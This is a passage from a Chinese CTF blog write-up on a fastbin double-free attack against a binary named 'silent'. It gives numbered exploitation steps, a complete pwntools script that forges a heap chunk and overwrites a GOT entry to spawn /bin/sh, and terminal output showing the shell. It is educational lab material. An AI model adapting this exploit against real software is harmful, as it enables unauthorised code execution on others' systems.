<p>1：首先连续申请三个96字节的chunk，第1个和第2个chunk用来执行double free操作，第3个chunk保存“/bin/sh”字符串。<br>2：按顺序释放第1个chunk，第2个chunk，第1个chunk。<br>3：再连续申请2个96字节的chunk，这时，对应bin中的头节点为第1个chunk。<br>4：修改第1个chunk的fd为0x60209d。<br>5：申请一个96字节的chunk，这时，对应bin中的头节点为0x60209d。<br>6：接着申请一个96字节的chunk，这时操控的内存区域就是0x60209d开始的内存区域，偏移16字节之后，便是对应chunk的用户数据区。也就是，在这里形成了一个伪造的chunk，并且可以对其进行写入。</p>
</blockquote>
<p>exploit代码如下：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">p = process(<span class="string">'./silent'</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line">p.sendline(<span class="string">'96'</span>)</span><br><span class="line">p.sendline(<span class="string">'0'</span>*<span class="number">0x5f</span>)</span><br><span class="line">p.sendline()</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line">p.sendline(<span class="string">'96'</span>)</span><br><span class="line">p.sendline(<span class="string">'1'</span>*<span class="number">0x5f</span>)</span><br><span class="line">p.sendline()</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line">p.sendline(<span class="string">'96'</span>)</span><br><span class="line">p.sendline(<span class="string">'/bin/sh\x00'</span>+<span class="string">'2'</span>*<span class="number">0x57</span>)</span><br><span class="line">p.sendline()</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'2'</span>)</span><br><span class="line">p.sendline(<span class="string">'0'</span>)</span><br><span class="line">p.sendline()</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'2'</span>)</span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line">p.sendline()</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'2'</span>)</span><br><span class="line">p.sendline(<span class="string">'0'</span>)</span><br><span class="line">p.sendline()</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line">p.sendline(<span class="string">'96'</span>)</span><br><span class="line">p.sendline(<span class="string">'A'</span>*<span class="number">0x5f</span>)</span><br><span class="line">p.sendline()</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line">p.sendline(<span class="string">'96'</span>)</span><br><span class="line">p.sendline(<span class="string">'B'</span>*<span class="number">0x5f</span>)</span><br><span class="line">p.sendline()</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'3'</span>)</span><br><span class="line">p.sendline(<span class="string">'0'</span>)</span><br><span class="line">p.sendline(p64(<span class="number">0x60209d</span>))</span><br><span class="line">p.sendline()</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line">p.sendline(<span class="string">'96'</span>)</span><br><span class="line">p.sendline(<span class="string">'C'</span>*<span class="number">0x5f</span>)</span><br><span class="line">p.sendline()</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'1'</span>)</span><br><span class="line">p.sendline(<span class="string">'96'</span>)</span><br><span class="line">p.sendline(<span class="string">'\x00'</span>*<span class="number">0x13</span>+p64(<span class="number">0x602018</span>))</span><br><span class="line">p.sendline()</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'3'</span>)</span><br><span class="line">p.sendline(<span class="string">'0'</span>)</span><br><span class="line">p.sendline(p64(<span class="number">0x400730</span>))</span><br><span class="line">p.sendline()</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">'2'</span>)</span><br><span class="line">p.sendline(<span class="string">'2'</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></p>
<p>由于未知原因，pwntool每一次发送的数据会出现顺序错乱，所以每一个完整的操作完成之后，需要间隔1秒。<br>成功getshell<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">pur3uit@pur3uit:~/ctf$ python exp.py </span><br><span class="line">[+] Starting local process &apos;./silent&apos;: pid 3938</span><br><span class="line">[*] Switching to interactive mode</span><br><span class="line">cat: banner.txt: No such file or directory</span><br><span class="line">$ ls</span><br><span class="line">exploit.py  exp.py  silent</span><br><span class="line">$ whoami</span><br><span class="line">pur3uit</span><br></pre></td></tr></table></figure></p>
<h3 id="参考文献"><a href="#参考文献" class="headerlink" title="参考文献"></a>参考文献</h3><p><a href="https://github.com/cqlin1995/cqlin1995.github.io/blob/master/2018/06/25/%E5%BC%BA%E7%BD%91%E6%9D%AFsilent%E4%BB%A5%E5%8F%8Adouble-free/glibc%E5%A0%86%E5%88%A9%E7%94%A8%E7%9A%84%E8%8B%A5%E5%B9%B2%E6%96%B9%E6%B3%95.pdf" target="_blank" rel="noopener">Glibc堆利用的若干方法</a><br><a href="http://manyface.github.io/2016/05/19/AndroidHeapUnlinkExploitPractice/?spm=a313e.7916648.0.0.604e596fE0PQXe" target="_blank" rel="noopener">Android中堆unlink利用学习</a></p>

      
    </div>

    

    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/pwn/" rel="tag"># pwn</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/06/23/Glibc-堆管理学习笔记/" rel="next" title="Glibc-堆管理学习笔记">
                <i class="fa fa-chevron-left"></i> Glibc-堆管理学习笔记
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/06/26/afl-qemu安装错误/" rel="prev" title="afl-qemu安装错误">
                afl-qemu安装错误 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Pur3uit</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">6</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-categories">
                  <a href="/categories/index.html">
                    
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">2</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
                
                
                <div class="site-state-item site-state-tags">
                  <a href="/tags/index.html">
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">4</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          

          

          
          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#unlink操作"><span class="nav-number">1.</span> <span class="nav-text">unlink操作</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#small-bin的double-free"><span class="nav-number">2.</span> <span class="nav-text">small bin的double free</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#反编译silent"><span class="nav-number">2.1.</span> <span class="nav-text">反编译silent</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用过程"><span class="nav-number">2.2.</span> <span class="nav-text">利用过程</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#fast-bin的double-free"><span class="nav-number">3.</span> <span class="nav-text">fast bin的double free</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#两个安全检查"><span class="nav-number">3.1.</span> <span class="nav-text">两个安全检查</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#绕过上述检查"><span class="nav-number">3.2.</span> <span class="nav-text">绕过上述检查</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#利用过程-1"><span class="nav-number">3.3.</span> <span class="nav-text">利用过程</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#参考文献"><span class="nav-number">4.</span> <span class="nav-text">参考文献</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Pur3uit</span>

  

  
</div>




  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动 v3.7.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/theme-next/hexo-theme-next">NexT.Pisces</a> v6.1.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=6.1.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=6.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.1.0"></script>



  



	





  





  










  





  

  

  

  
  

  
  

  


  
  

  

  

  

  

</body>
</html>
